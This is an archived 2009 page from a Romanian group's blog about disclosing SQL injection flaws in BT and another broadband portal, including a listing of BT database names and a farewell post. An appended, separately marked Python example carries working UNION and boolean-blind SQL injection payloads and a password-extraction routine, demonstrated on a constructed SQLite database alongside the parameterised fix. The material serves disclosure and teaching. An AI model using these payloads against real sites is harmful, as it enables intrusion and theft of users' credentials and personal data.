Archive for March, 2009
Posted on March 24th, 2009
As we were saying in our interview over at RadioLynx, we get bored extremely fast when it comes to projects dealing with hacking and security. Well then, we have gotten to the point where most of the team members have had "enough" of it. Don't go wacko over this. We are not pulling the plug because of any external factors or out of fear. We simply don't have the time and the desire to continue. Contrary to many opinions, we do have private lives.
We didn't manage to publish enough articles and/or explanations/tutorials for our readers, but still, we set the stage and for sure others will follow in a short time. It's not difficult. There will always be intelligent people who will want to show people the risks lurking all over the web. If we managed to get into the spotlight all over the world in just 4 months, then for sure others can be at least as successful as we were.
We would like to thank those who supported us (especially zoso, who gave us a good kick-start, and Bobby Voicu for his "official" promotion through RadioLynx). We would also like to extend our thanks to those who were against us but managed to motivate their opinions clearly and in a nice manner. We would like to give special thanks to newspapers outside Romania (especially theregister) who shed a proper and realistic light on our actions, and also to the guys at news.softpedia.com and jurnalul.ro, who were the only local press representatives who did not jump to conclusions and make idiotic, bombastic claims just to gain ratings. If there were others who were true to the facts and we failed to mention them, we sincerely apologise, as we don't have an idea of how much of the local press mentioned us.
Most importantly, our visitors, who gave us moral support and articles for "readers' day". We recommend you continue to report vulnerabilities by mailing the affected websites. Not to help site admins, but rather to inform innocent people of eventual problems caused by incompetence and lack of attention from the coders or sysadmins.
As we were saying in our article "words", large companies will never admit to the problems they have, no matter how large they are. This is common practice in the business and it serves to keep their public image clean. Don't swallow the bait. Official notes are only meant to disinform you and mislead you from the truth about the dangers you were exposed to.
Still, there were those rare cases of fair play which we truly appreciate and which made us realise that there is still hope and that out there, in the "wild wild web", you can still find quality people. This is one of the reasons we did not engage in controversies over the official declarations coming from corporate PR departments regarding the problems discovered on their websites. They minimised the issues to the point where they led people to believe nobody could have been affected. Sadly, reality is not that bright.
Hackersblog team:
Tocsixu a.k.a. Shocker - administrator http://hackpedia.info / http://www.freakz.ro
Age: 19 yr
Studies: student
Status: not married
—-
Epic - administrator http://hackpedia.info
Age: 23
Studies: student
Status: stable relationship
—-
Unu a.k.a. unu_1234567 - team member of http://rstcenter.com
Age: 34
Studies: -
Status: married
—-
Andre2000 a.k.a. Flama a.k.a. Kenpachi - administrator http://rstcenter.com
Age: 22
Studies: student
Status: presumably engaged
—-
Virjil a.k.a. kw3rln – administrator http://rstcenter.com
Age: 20
Studies: student
Status: engaged to Zakuta@RST
—-
2fingers a.k.a. Nemessis – http://gandestevito.blogspot.com / ex-admin http://rstcenter.com
Age: 27
Studies: gymnasium
Status: apparently engaged for about 13 years
—-
Translator: (working in the shadows)
Age: 33
Studies: professional school
Status: not married
This being said, we bid you farewell and maybe we will meet again in other circumstances.
Best regards,
HackersBlog Team
Posted on March 15th, 2009
“Fast and reliable broadband and internet access, tv, plus email, sms, webspace, and top rated search”
A huge portal with hundreds of thousands of registered users for different services. Same story: an unsanitized parameter allows SQL injection, and therefore access to the databases. In the first picture I concatenated the version, the user and the name of the database, as well as the names of the tables we gain access to (only some of them are visible).
In the next picture you can see the login data as well as the personal data of the users (username, firstname, surname, company, telephone, regdate, lastlogin, email, password):
In the last screenshot you can see some data from the customers database:
Posted on March 13th, 2009
Let us explain important details about our work.
There is, and always will be, a practice among companies of denying the gravity of certain vulnerabilities.
We understand this. It's normal for them to keep face and maintain client confidence and trust. However, we don't agree with these practices. We helped them and their clients by bringing the issues at hand to their attention, and it is their responsibility to clean up their image, even if this can result in unpleasant situations for us.
Keep in mind that every time a vulnerability wasn't extremely dangerous we said so, in order to avoid confusion. We only post what we do, without truncating the truth just to get props from our "fans". We don't earn any money from this, the daily traffic we generate is useless to us and we never want to commercialise this blog. If we had wanted fans and to be called "1337 hackers" by kids, we would have started defacing every vulnerable site in sight. But we don't want to do that and we'll never step back onto the blackhat side. Our goal is, and will be, to inform the masses about the dangers that lurk on the web. The fact that millions of people have been spared some problems by our actions gives us enough satisfaction.
The fact that a company diminishes the gravity of the situation through official statements doesn't shed a good light on our actions, but we'll never try to prove we're right, because that could only be done by endangering the users just to satisfy our pride. It would not be mature, professional or normal of us to do something like that.
We'll continue to follow the rules we've pledged to: find the vulns, contact the admins, publish the information in a way that protects the users. That's it. We don't ask users to go against the affected companies/websites, but rather want them and the owners of the websites to be aware of the possible dangers that result from failing to secure a website that holds confidential information. If in doubt, it is best to ask a qualified person who is not involved with any of the parties (us or the websites) and then draw your own conclusions.
This article was not made in reference to a certain company. We’ve generalized in order to cover the problem as simply as possible.
That’s about it about this topic. We wish you a pleasant stay here on http://hackersblog.org
Posted on March 13th, 2009
Posted on March 12th, 2009
A very interesting presentation (video) from the Blackhat conference.
Posted on March 10th, 2009
We held back publication of the vulnerable parameter, which would allow full access to ALL the databases on the main server, until the issue was fixed. Today all the vulnerable pages have been taken offline for maintenance and security testing, so we will continue with the full disclosure.
Because this was a blind SQL injection, I cannot show you the results of the injection in the web page itself; the query output never appears in the response, only the effect of a true or false condition does. I made two screenshots showing that the parameter is vulnerable. In the first one you can see that with AND+1=1 appended (the + is a URL-encoded space), a condition that is always true, the full page content is displayed:
In the second one, where we append AND+1=2, which is always false, the page does not load.
Now, let's see which databases we gained access to:
available databases [37]:
[*] BT
[*] BT_Argos
[*] BT_BB_Anywhere
[*] BT_BBAndLine
[*] BT_BroadbandOpenzone
[*] BT_Bundling
[*] BT_CallMeArgos
[*] BT_CallSave
[*] BT_CallSaveStaff
[*] BT_comparebroadband
[*] BT_dabsCallback
[*] BT_DigitalVaultPlus
[*] BT_DisneyComp
[*] BT_HomeITCall
[*] BT_HomeITInstall
[*] BT_ITCalculator
[*] BT_Main
[*] BT_MobilePicker_Flexible
[*] BT_NetProtectOrder
[*] BT_ppc
[*] BT_PrinceCaspian
[*] BT_recontracting
[*] BT_RecontractingGenZ
[*] BT_SecureAdmin
[*] BT_SimOffer
[*] BT_Tactical_oneclick
[*] BT_TellAFriend
[*] BT_Tinkerbell
[*] BT_TotalBroadband
[*] BT_VisionOrderJourney
[*] BTM00585
[*] Crayon_Utility
[*] master
[*] MobilePortal
[*] model
[*] msdb
[*] tempdb
The first database, "BT", is the most interesting one. Nonetheless, the others also yield a wealth of important data about the users: personal data, passwords, etc.
The user and [censored for security reasons] can be easily extracted. They contain login data for different databases (default_censored for security reasons). You can extract the names and passwords of sysusers just as well; those give direct access to the server.
Database: m*****
Table: s*****
[18 columns]
+-------------+-----------+
| Column      | Type      |
+-------------+-----------+
(Content removed for security reasons)
This blind SQL injection grants far more access, to larger parts of the databases, than the one used to find the previous vulnerability in BT.com. Using this vulnerability an attacker can access the personal data of the users.
Don't rush to conclusions and start pointing fingers before you see the next articles, where we will show similar issues with other large telecommunication providers. As we said earlier, we don't take sides, but rather want to show that the above-mentioned vulns can be found almost everywhere.
We would like to thank BT.com for the fair play and manners they displayed in addressing this issue in the email we received from them.
We appreciate and support their mature and to-the-point attitude. It is very important to us.
Posted on March 10th, 2009
Because you used the expression "a Romanian hacker stole". You are the worst and you don't check your information.
If we had stolen, would this article appear on their official blog? Who would thank thieves? You are a disgrace to the media in Romania.
Update: the recording of the show has been removed from the site and the text has been corrected.
Posted on March 10th, 2009
“BT is one of the world’s leading providers of communications solutions and services operating in 170 countries. Its principal activities include networked IT services, local, national and international telecommunications services, and higher-value broadband and internet products and services. BT consists principally of four lines of business: BT Global Services, Openreach, BT Retail and BT Wholesale.”
“The most complete UK broadband, phone lines and mobile products, digital TV, web hosting, online security and networked IT services for home”
The description says it all. One of the giants in IT, mobile, TV and internet services. A giant company with a huge database. You don't need to be an internet whiz, or even computer literate, to understand the tremendous implications of such a database being vulnerable.
A faulty, improperly sanitized parameter opens the vault to the precious databases. One can gain access to such ordinary things as personal data, login data and the like. In the first query I concatenated the table names as well as the version and the user of the database.
Let's see some of the user login data for different databases (among which, of course, the admins of the respective sections).
As well as the login data and personal data (email, active, lastloggedin, firstname, surname, address, town, postcode, level, randomkey, password) of some of the registered users.
To be continued... but first we need to see the reported vulns patched. We don't want to put BT's customers in danger by providing sensitive information and hints to a potential attacker.
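As an added example (not hackersblog's code, and nothing taken from the sites discussed on this page), here are the two injection styles described in this post and in the blind-injection post above, run against a deliberately vulnerable query over an in-memory SQLite database: a UNION-based injection that returns the database version and the table names concatenated into one field and then username:password pairs, the way the screenshots did; a boolean-blind oracle in which an appended AND 1=1 leaves the page populated and AND 1=2 empties it, used to recover a password one character at a time without the value ever appearing in a response; and the parameterised query that makes the same payloads inert. The products and users tables, the alice and bob accounts and the id parameter are constructed for the example. The database list above (master, model, msdb, tempdb) is what Microsoft SQL Server exposes, so the version and metadata functions differ on that engine, but the mechanics are the same.

```python
"""Added example (not hackersblog's code): UNION-based and boolean-blind SQL
injection against a deliberately vulnerable query on an in-memory SQLite
database, beside the parameterised query that stops it. All data is constructed."""
import sqlite3


def build_db():
    # Constructed sample tables standing in for a portal's customer data.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 'broadband'), (2, 'tv');
        CREATE TABLE users (id INTEGER, username TEXT, email TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice@example.com', 'hunter2'),
                                 (2, 'bob', 'bob@example.com', 's3cret');
    """)
    return con


def vulnerable_lookup(con, product_id):
    # The unsanitised parameter: the raw string is pasted into the SQL text.
    sql = "SELECT name FROM products WHERE id = " + product_id
    return [row[0] for row in con.execute(sql)]


def safe_lookup(con, product_id):
    # Same query with a bound parameter: the input can never become SQL.
    sql = "SELECT name FROM products WHERE id = ?"
    return [row[0] for row in con.execute(sql, (product_id,))]


def union_dump(con):
    # UNION-based: one request returns version and table names concatenated
    # into a single column, a second returns username:password pairs.
    fingerprint = vulnerable_lookup(
        con, "0 UNION SELECT sqlite_version() || ':' || "
        "(SELECT group_concat(name) FROM sqlite_master WHERE type = 'table')")
    creds = vulnerable_lookup(
        con, "0 UNION SELECT username || ':' || password FROM users")
    return fingerprint, creds


def make_oracle(con):
    # Boolean-blind oracle: True when the injected condition leaves the page
    # populated (AND 1=1), False when it empties it (AND 1=2).
    calls = {"n": 0}

    def oracle(condition):
        calls["n"] += 1
        return bool(vulnerable_lookup(con, "1 AND (" + condition + ")"))

    return oracle, calls


def blind_extract(oracle, expr, max_len=64):
    # Recover the value of a scalar subquery without ever seeing it in a
    # response: one length probe per position, then a binary search on the
    # character's code point (7 probes for 0..127) instead of trying each char.
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length(({expr})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    con = build_db()
    oracle, calls = make_oracle(con)
    result = {"true_probe": oracle("1=1"), "false_probe": oracle("1=2")}
    result["fingerprint"], result["creds"] = union_dump(con)
    calls["n"] = 0
    result["blind_password"] = blind_extract(
        oracle, "SELECT password FROM users WHERE username = 'alice'")
    result["blind_queries"] = calls["n"]
    # The parameterised version treats the whole payload as one literal id.
    result["safe_normal"] = safe_lookup(con, "1")
    result["safe_injected"] = safe_lookup(con, "1 AND 1=1")
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it with python3 and it prints each result. The query counter is the practical point of the blind branch: 57 requests recover a 7-character password (one length probe plus seven comparison probes per character, and a final length probe that fails), where trying every printable character in turn would take several hundred. Against a live site each of those probes is one HTTP request, which is also why this kind of extraction is easy to spot in web server logs as a burst of near-identical requests differing only in the injected condition.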
Posted on March 10th, 2009